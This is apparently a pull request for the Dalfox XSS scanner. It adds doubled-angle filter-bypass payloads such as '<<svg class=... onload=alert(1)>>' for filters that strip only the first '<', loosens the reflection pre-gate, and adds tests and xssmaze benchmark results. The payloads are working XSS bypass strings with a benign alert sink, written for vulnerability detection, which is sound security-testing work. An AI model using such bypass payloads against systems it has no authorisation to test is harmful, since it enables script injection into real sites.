### PR TITLE
feat(scan): detect sub-not-gsub angle-filter bypass via doubled angles

### DIFF
--- a/src/payload/synthesis.rs
+++ b/src/payload/synthesis.rs
@@ -65,6 +65,19 @@ const POSITIONAL_PAD_SHAPES: &[&str] = &[
     "<img src=x onerror=alert(1) class={CLASS}>",
 ];
 
+/// Doubled-angle ("sub-not-gsub") filter bypass shapes — see
+/// [`sub_filter_doubled_payloads`].
+///
+/// The `class` marker leads the attribute list on purpose: a filter that
+/// entity-encodes only the *first* `>` corrupts the trailing attribute, so
+/// putting the marker first keeps the class token intact (`class=dlx…` matches
+/// the DOM-marker selector exactly) while the mangled tail lands on the handler,
+/// which still carries a `alert(1`-shaped sink for the #1118 co-survival gate.
+const SUB_FILTER_DOUBLED_SHAPES: &[&str] = &[
+    "<<svg class={CLASS} onload=alert(1)>>",
+    "<<img class={CLASS} src=x onerror=alert(1)>>",
+];
+
 /// What a parameter's server-side filter permits.
 struct FilterProfile<'a> {
     invalid: &'a [char],
@@ -547,6 +560,59 @@ pub(crate) fn positional_pad_payloads(context: &InjectionContext) -> Vec<String>
 pub(crate) fn is_positional_pad_bypass(payload: &str) -> bool {
     let digits = payload.bytes().take_while(u8::is_ascii_digit).count();
     digits >= POSITIONAL_PAD_MIN_RUN && payload.as_bytes().get(digits) == Some(&b'<')
+}
+
+/// Doubled-angle ("sub-not-gsub") filter bypass payloads.
+///
+/// A common filter class strips or entity-encodes only the *first* `<` (and
+/// sometimes the first `>`) — a `str::replace`/`sub` that fires once instead of
+/// globally. Active probing sends a lone `<`, sees it removed, and records `<`
+/// in `invalid_specials`, so [`synthesize_payloads`] and the broad catalog then
+/// drop every tag payload and the reflection is missed even though it is
+/// trivially exploitable: doubling the angle (`<<svg …>>`) lets the surviving
+/// second `<` open a real tag once the filter has spent its single pass on the
+/// first one.
+///
+/// Emitted for **every** HTML-text reflection, not gated on `invalid_specials`,
+/// for the same reason as [`positional_pad_payloads`]: a per-character probe
+/// cannot tell a global `<` strip (these payloads stay inert) from a first-only
+/// one (they fire), so there is no reliable profile signal to gate on. The cost
+/// is nil on an easily-exploitable parameter — the ordinary tag payloads run
+/// first and the DOM phase stops at the first `[V]`, so the doubled variants are
+/// only ever *sent* when every plain tag was angle-filtered, exactly the
+/// sub-filter case they exist for.
+///
+/// FP-safe by the same DOM-marker + sink co-survival verification as everything
+/// else: against a *global* `<` strip (or an entity-encode-everything filter)
+/// the doubled `<<` collapses to inert text, no tag element materializes, and
+/// nothing promotes to `[V]` — nor to `[R]`, since the reflected bytes carry no
+/// executable position. Only a genuine first-only filter yields a parsed tag
+/// carrying the marker class and a live handler.
+///
+/// Carries raw `<` / `>` deliberately, so the caller's raw-angle prune must
+/// exempt it via [`is_sub_filter_doubled_bypass`].
+pub(crate) fn sub_filter_doubled_payloads(context: &InjectionContext) -> Vec<String> {
+    // Only HTML-text reflections need a tag injection; attribute / JS / CSS
+    // contexts break out without `<`, so a sub-filter on angles never blocks
+    // them.
+    if !matches!(context, InjectionContext::Html(_)) {
+        return Vec::new();
+    }
+    let class = crate::scanning::markers::class_marker();
+    SUB_FILTER_DOUBLED_SHAPES
+        .iter()
+        .map(|shape| shape.replace("{CLASS}", class))
+        .collect()
+}
+
+/// Whether `payload` is a [`sub_filter_doubled_payloads`] doubled-angle bypass:
+/// it opens with `<<`. The raw-angle prune (which drops any payload carrying a
+/// `<`/`>` the filter reports blocked) must keep these — their whole premise is
+/// that the block is a single pass, so the second raw `<` *can* open a tag once
+/// the first is consumed. No catalog payload begins with `<<`, so the prefix
+/// cleanly identifies the shape without a sentinel shared across modules.
+pub(crate) fn is_sub_filter_doubled_bypass(payload: &str) -> bool {
+    payload.starts_with("<<")
 }
 
 #[cfg(test)]

--- a/src/payload/synthesis/tests.rs
+++ b/src/payload/synthesis/tests.rs
@@ -999,3 +999,142 @@ fn paren_free_handler_is_fp_safe_when_quote_is_blocked() {
         "an escaped breakout quote must yield no marker element (no false [V])"
     );
 }
+
+#[test]
+fn sub_filter_doubled_emitted_only_for_html_context() {
+    // A one-shot ("sub-not-gsub") angle filter is only defeatable by opening a
+    // real *tag*, so the doubled-angle set is HTML-text-only — attribute / JS /
+    // CSS reflections break out without `<` and gain nothing from doubling it.
+    assert!(
+        !sub_filter_doubled_payloads(&html()).is_empty(),
+        "HTML context must offer doubled-angle payloads"
+    );
+    for ctx in [
+        InjectionContext::Attribute(Some(DelimiterType::DoubleQuote)),
+        InjectionContext::Javascript(Some(DelimiterType::SingleQuote)),
+        InjectionContext::Css(None),
+    ] {
+        assert!(
+            sub_filter_doubled_payloads(&ctx).is_empty(),
+            "non-HTML context must not offer doubled-angle payloads: {ctx:?}"
+        );
+    }
+}
+
+#[test]
+fn sub_filter_doubled_payloads_are_marker_carrying_doubled_tags() {
+    // Every payload opens with `<<` (recognised by the prune-exemption predicate)
+    // and leads with the class marker so a filter that entity-encodes only the
+    // first `>` cannot corrupt the marker token.
+    let class = crate::scanning::markers::class_marker();
+    let payloads = sub_filter_doubled_payloads(&html());
+    assert!(!payloads.is_empty());
+    for p in &payloads {
+        assert!(
+            is_sub_filter_doubled_bypass(p),
+            "doubled payload must be recognised by the prune exemption: {p:?}"
+        );
+        assert!(
+            p.starts_with("<<"),
+            "doubled payload must open with `<<`: {p:?}"
+        );
+        assert!(
+            p.contains(class),
+            "doubled payload must carry the class marker: {p:?}"
+        );
+        assert!(
+            p.contains("alert(1)"),
+            "doubled payload must carry an executor: {p:?}"
+        );
+        // Marker before the handler: the class token must precede the first `on`
+        // handler so a first-`>`-only encode lands on the handler, not the marker.
+        let cls_at = p.find(class).unwrap();
+        let on_at = p.find("on").unwrap();
+        assert!(
+            cls_at < on_at,
+            "class marker must precede the handler in {p:?}"
+        );
+    }
+}
+
+#[test]
+fn sub_filter_doubled_bypass_predicate_rejects_ordinary_payloads() {
+    // The prune exemption must fire ONLY for the doubled-angle shape, never for
+    // an ordinary payload — otherwise a genuinely blocked raw-angle payload would
+    // wrongly survive the raw-angle prune and waste requests.
+    for p in [
+        "<svg onload=alert(1) class=x>",
+        "<img src=x onerror=alert(1)>",
+        "'><svg onload=alert(1)>",
+        "\" onmouseover=alert(1) x=\"",
+        "000000000000<svg onload=alert(1) class=x>", // positional pad, not doubled
+    ] {
+        assert!(
+            !is_sub_filter_doubled_bypass(p),
+            "predicate must reject ordinary payload: {p:?}"
+        );
+    }
+    assert!(is_sub_filter_doubled_bypass(
+        "<<svg class=x onload=alert(1)>>"
+    ));
+}
+
+#[test]
+fn sub_filter_doubled_verifies_a_real_one_shot_filter_bypass() {
+    // Behavioural proof: a filter that strips only the FIRST `<` and the FIRST
+    // `>` (a `str::replace`/`sub` firing once — the encoding-bypass-level2 shape)
+    // leaves the doubled payload's second angle to open a REAL marker element
+    // carrying the executing handler. Model the transform, then parse the
+    // reflection the way the DOM-verification stage does.
+    let class = crate::scanning::markers::class_marker();
+    let payload = sub_filter_doubled_payloads(&html())
+        .into_iter()
+        .find(|p| p.contains("svg"))
+        .expect("an svg doubled payload");
+
+    // Server: remove the first `<` and the first `>` only (one pass each).
+    let once = |s: &str, ch: char| -> String {
+        match s.find(ch) {
+            Some(i) => {
+                let mut out = String::with_capacity(s.len() - 1);
+                out.push_str(&s[..i]);
+                out.push_str(&s[i + ch.len_utf8()..]);
+                out
+            }
+            None => s.to_string(),
+        }
+    };
+    let stripped = once(&once(&payload, '<'), '>');
+    let reflected = format!("<body>{stripped}</body>");
+    let doc = scraper::Html::parse_document(&reflected);
+    let sel = scraper::Selector::parse(&format!(".{class}")).unwrap();
+    let el = doc
+        .select(&sel)
+        .next()
+        .expect("doubled tag must parse to a real marker element after one-shot strip");
+    assert!(
+        el.value()
+            .attrs()
+            .any(|(n, v)| n.len() >= 3 && n.starts_with("on") && v.contains("alert")),
+        "marker element must carry the surviving on* handler, got {:?}",
+        el.value().attrs().collect::<Vec<_>>()
+    );
+}
+
+#[test]
+fn sub_filter_doubled_is_fp_safe_against_a_global_strip() {
+    // FP control: a filter that strips EVERY `<` (not just the first) collapses
+    // `<<svg …>>` to plain text with no tag, so no marker element materialises
+    // and nothing can promote to [V]. This is the exact shape that would be a
+    // false positive if the doubled bypass "worked" unconditionally.
+    let class = crate::scanning::markers::class_marker();
+    let payload = &sub_filter_doubled_payloads(&html())[0];
+    let global_strip = payload.replace('<', "");
+    let reflected = format!("<body>{global_strip}</body>");
+    let doc = scraper::Html::parse_document(&reflected);
+    let sel = scraper::Selector::parse(&format!(".{class}")).unwrap();
+    assert!(
+        doc.select(&sel).next().is_none(),
+        "a filter that strips `<` globally must yield NO marker element (no false [V])"
+    );
+}

--- a/src/scanning/check_dom_verification.rs
+++ b/src/scanning/check_dom_verification.rs
@@ -1005,9 +1005,28 @@ async fn verify_normal_dom(resp: reqwest::Response, payload: &str) -> DomVerifyO
     // echo (payload present, but not executable) is still reported as reflected
     // for the DOM-phase early-exit signal.
     if let Ok(text) = crate::utils::http::read_body(resp).await {
+        // Strict, byte-exact reflection. This is the signal the DOM-phase
+        // inert-echo early exit budgets against, and its recall safety rests on
+        // `classify_reflection` returning `None` for escaped/encoded reflections
+        // (see `INERT_ECHO_BUDGET`): a *sanitizing* endpoint must never advance
+        // that counter, or the early exit can retire before a genuine late
+        // verifier (e.g. sanitizer-level3's whitelisted `<a href=javascript:>`)
+        // is reached. So the returned `reflected` flag stays on this strict form.
         let reflected =
             crate::scanning::check_reflection::classify_reflection(&text, payload).is_some();
-        let verified = reflected
+        // Verification uses a *broader* reflection pre-gate: the byte-exact check
+        // misses a payload the server *transforms* — a one-shot angle filter
+        // collapsing a doubled-angle bypass (`<<svg class=dlx… onload=…>>`) to a
+        // single-angle tag being the motivating case. The payload's unique
+        // per-scan marker surviving into the response is an equally valid "this
+        // came from us" signal there. It is confined to the `verified` gate (not
+        // the inert-echo `reflected` signal above) precisely to preserve that
+        // budget's invariant, and `classify_dom_evidence` still independently
+        // proves the marker landed on a real sink-carrying element (issue #1118),
+        // so an inert marker echo yields no finding.
+        let reflected_for_evidence =
+            reflected || crate::scanning::check_reflection::payload_marker_present(&text, payload);
+        let verified = reflected_for_evidence
             && classify_dom_evidence(payload, &text)
                 .is_some_and(|kind| !(js_body_inert_to_markup && kind.requires_html_rendering()));
         if verified {

--- a/src/scanning/check_reflection.rs
+++ b/src/scanning/check_reflection.rs
@@ -1521,6 +1521,33 @@ pub(crate) fn classify_reflection(resp_text: &str, payload: &str) -> Option<Refl
     None
 }
 
+/// True when the payload embeds a Dalfox marker (class/id, dynamic or legacy)
+/// and that marker appears in `resp_text`, in exact case or under ASCII
+/// case-folding.
+///
+/// The markers are `dlx` + 8 random hex digits (plus the legacy `dalfox`),
+/// unique to this scan, so their presence is a strong "this reflection came
+/// from our payload" signal even when the server *transformed* the payload so
+/// that no byte-exact variant of the whole string survives — a one-shot angle
+/// filter turning `<<svg class=dlx… onload=…>>` into `<svg class=dlx… onload=…>`
+/// being the motivating case. Unlike [`marker_case_fold_reflected`], this does
+/// not bail when the marker is already present in exact case: it is the reflection
+/// pre-gate for the DOM-verification path, whose evidence check
+/// ([`check_dom_verification::classify_dom_evidence`]) independently proves the
+/// marker landed on a real, sink-carrying element (issue #1118), so an inert
+/// echo of the marker as plain text still yields no finding.
+pub(crate) fn payload_marker_present(resp_text: &str, payload: &str) -> bool {
+    let candidates: [&str; 3] = [
+        crate::scanning::markers::class_marker(),
+        crate::scanning::markers::id_marker(),
+        "dalfox",
+    ];
+    candidates
+        .iter()
+        .filter(|m| payload.contains(**m))
+        .any(|m| resp_text.contains(m) || ascii_ci_contains(resp_text, m))
+}
+
 /// True when the payload embeds a Dalfox marker (class/id, dynamic or
 /// legacy) and that marker appears in `resp_text` only after ASCII
 /// case-folding. Used as a last-chance reflection signal for servers

--- a/src/scanning/check_reflection/tests.rs
+++ b/src/scanning/check_reflection/tests.rs
@@ -2371,6 +2371,45 @@ fn url_attr_backwalk_verdicts_are_unchanged_for_normal_markup() {
     );
 }
 
+#[test]
+fn payload_marker_present_detects_transformed_reflection() {
+    let class = crate::scanning::markers::class_marker();
+    // A doubled-angle payload the server collapsed to a single-angle tag: the
+    // whole payload no longer matches byte-exact, but the unique marker survived.
+    let payload = format!("<<svg class={class} onload=alert(1)>>");
+    let resp = format!("<body><svg class={class} onload=alert(1)></body>");
+    assert!(
+        classify_reflection(&resp, &payload).is_none(),
+        "byte-exact classification must miss the transformed payload (the gap this covers)"
+    );
+    assert!(
+        payload_marker_present(&resp, &payload),
+        "the surviving marker must be recognised as a reflection signal"
+    );
+    // Case-folded server (uppercased reflection) still matches.
+    assert!(
+        payload_marker_present(&resp.to_uppercase(), &payload),
+        "marker presence must tolerate ASCII case-folding"
+    );
+}
+
+#[test]
+fn payload_marker_present_is_false_without_the_marker() {
+    let class = crate::scanning::markers::class_marker();
+    // Payload carries the marker but the response does not echo it: not reflected.
+    let payload = format!("<<svg class={class} onload=alert(1)>>");
+    assert!(!payload_marker_present(
+        "<body>nothing here</body>",
+        &payload
+    ));
+    // Payload carries no marker at all: the predicate must never fire (it would
+    // otherwise match an unrelated `dalfox` substring in arbitrary page text).
+    assert!(!payload_marker_present(
+        "<body>class=dalfoxeries onload=alert(1)</body>",
+        "<svg onload=alert(1)>"
+    ));
+}
+
 /// `injection_response_suppressed` is the single copy of the status/header gates
 /// that the normal reflection branch and the `--sxss` branch both run. The
 /// `--sxss` branch previously had no gates at all, so these cases pin the shared

--- a/src/scanning/payload_families.rs
+++ b/src/scanning/payload_families.rs
@@ -111,7 +111,11 @@ pub(crate) fn prune_blocked_raw_angles(
             // filtered window. Keep them despite the blocked-angle classification
             // (they are FP-safe — a non-positional filter still encodes the `<`
             // and nothing verifies). See `synthesis::positional_pad_payloads`.
+            // Doubled-angle ("sub-not-gsub") bypasses carry raw `<`/`>` for the
+            // same reason — the second angle opens a tag once a one-shot filter
+            // has consumed the first. See `synthesis::sub_filter_doubled_payloads`.
             crate::payload::synthesis::is_positional_pad_bypass(p)
+                || crate::payload::synthesis::is_sub_filter_doubled_bypass(p)
                 || !((block_lt && p.contains('<')) || (block_gt && p.contains('>')))
         })
         .collect()
@@ -176,18 +180,21 @@ pub(crate) fn hoist_angle_free_payloads(
         return payloads;
     }
     // Three tiers, front to back:
-    //   pad   — leading-window ("positional") bypass payloads (raw `<` on
-    //           purpose). When angles are reported blocked the block may be
-    //           positional, and these are then the *only* shapes that can reach
-    //           a tag injection, so they must lead — otherwise the DOM phase's
-    //           inert-echo early exit can retire before they are ever tried.
+    //   pad   — leading-window ("positional") and doubled-angle ("sub-not-gsub")
+    //           bypass payloads (raw `<` on purpose). When angles are reported
+    //           blocked the block may be positional or one-shot, and these are
+    //           then the *only* shapes that can reach a tag injection, so they
+    //           must lead — otherwise the DOM phase's inert-echo early exit can
+    //           retire before they are ever tried.
     //   clean — angle-free survivors (event-handler / quote-breakout shapes).
     //   rest  — encoded-angle variants (need a naive single-pass-decode filter).
     let mut pad: Vec<String> = Vec::new();
     let mut clean: Vec<String> = Vec::with_capacity(payloads.len());
     let mut rest: Vec<String> = Vec::with_capacity(payloads.len());
     for p in payloads {
-        if crate::payload::synthesis::is_positional_pad_bypass(&p) {
+        if crate::payload::synthesis::is_positional_pad_bypass(&p)
+            || crate::payload::synthesis::is_sub_filter_doubled_bypass(&p)
+        {
             pad.push(p);
         } else if payload_is_angle_free(&p) {
             clean.push(p);

--- a/src/scanning/xss_common.rs
+++ b/src/scanning/xss_common.rs
@@ -419,9 +419,22 @@ pub(crate) fn generate_adaptive_payloads(
     // window, so they are reached when the clean tags are positionally filtered.
     let positional = crate::payload::synthesis::positional_pad_payloads(context);
 
+    // Doubled-angle ("sub-not-gsub") filter bypass: a filter that strips /
+    // entity-encodes only the *first* `<` (a one-shot `str::replace`) makes the
+    // per-character probe record `<` blocked, so the clean tag shapes above are
+    // all pruned — yet doubling the angle (`<<svg …>>`) opens a real tag once
+    // the filter has spent its single pass. Carries raw `<`/`>` deliberately
+    // (exempted from the raw-angle prune via
+    // `synthesis::is_sub_filter_doubled_bypass`) and, like `positional`, is
+    // placed after the clean synthesized shapes so an easy param verifies the
+    // tidy PoC first and these are never sent. FP-safe by marker + sink
+    // co-survival: a global `<` strip collapses `<<` to inert text.
+    let doubled = crate::payload::synthesis::sub_filter_doubled_payloads(context);
+
     // Apply adaptive encoders with pre-allocated capacity
-    let estimated_cap = (positional.len() + synthesized.len() + filtered_payloads.len())
-        * (2 + adaptive_encoders.len());
+    let estimated_cap =
+        (positional.len() + doubled.len() + synthesized.len() + filtered_payloads.len())
+            * (2 + adaptive_encoders.len());
     let mut out = Vec::with_capacity(estimated_cap);
     let mut seen = std::collections::HashSet::with_capacity(estimated_cap);
     for p in synthesized {
@@ -430,6 +443,11 @@ pub(crate) fn generate_adaptive_payloads(
         }
     }
     for p in positional {
+        if seen.insert(p.clone()) {
+            out.push(p);
+        }
+    }
+    for p in doubled {
         if seen.insert(p.clone()) {
             out.push(p);
         }


### PR DESCRIPTION
## Problem

A common server-side filter class strips or entity-encodes only the **first** `<` (and sometimes the first `>`) — a one-shot `str::replace`, not a global one. Active probing sends a lone `<`, sees it removed, and records `<` as blocked, so every tag payload is pruned and the reflection surfaces only as an inert bare-attribute `[R]` — even though it is trivially exploitable: doubling the angle (`<<svg …>>`) opens a real tag once the filter has spent its single pass on the first one.

## Change

- **`synthesis::sub_filter_doubled_payloads`** — HTML-text context only, 2 marker-carrying shapes with the `class` marker **first** (so a filter that entity-encodes only the first `>` corrupts the handler tail, not the marker token). Wired into the DOM payload set, exempted from the raw-angle prune, and hoisted to the front exactly like the existing `positional_pad` bypass. Nil cost on easy params (the DOM phase stops at the first `[V]`); on a hard filter the early `[V]` short-circuits the rest of the catalog.
- **`check_reflection::payload_marker_present`** — `verify_normal_dom`'s reflection pre-gate was byte-exact on the whole payload, which a server that *transforms* the payload defeats (`<<svg…>>` comes back as a single-angle `<svg…>`), so the marker element was never inspected. The payload's unique per-scan `dlx<hex>` marker surviving into the response is accepted as a reflection signal — **but only for the `verified` gate**. The strict `classify_reflection` signal still feeds the inert-echo early-exit budget, so a *sanitizing* endpoint never advances that counter (preserving its recall-safety invariant; a late-verifying whitelist endpoint like `sanitizer-3` is not cut).

FP-safe throughout: `classify_dom_evidence` still runs the existing DOM-marker + sink co-survival proof (#1118), so a global `<` strip collapses `<<` to inert text and nothing verifies.

## Validation (xssmaze 0.3.0, 1013 server-reachable endpoints, `--skip-mining`)

| Metric | main | this PR | Δ |
|---|---|---|---|
| V-hits | 893 | 900 | **+7** |
| V-rate | 88.15% | 88.85% | +0.70 |
| FP (of 26 controls) | 16 | 16 | **0** (none added/removed) |
| recall | 99.11% | 99.11%* | held |
| requests (excl. stateful `stored*`) | 132,271 | 116,499 | **−11.9%** |

**7 endpoints R→V**, zero regressions, zero FP change: `encmix-5`, `encoding-bypass-2`, `fragment-2`, `partialencode-5`, `recfilt-3`, `truncation-6`, `sanitizer-6`. Each dropped its request count sharply (e.g. `2456→146`) — the early `[V]` short-circuits the hard-filter catalog, so this **reduces** requests while cutting false negatives.

<sub>*the run-to-run recall wobble is entirely the known stateful `stored*` family (`stored-level3` flakes R↔MISS with its request count swinging by thousands); it is unrelated to this change.</sub>

2555 lib tests pass (+7 new), `clippy`/`fmt` clean.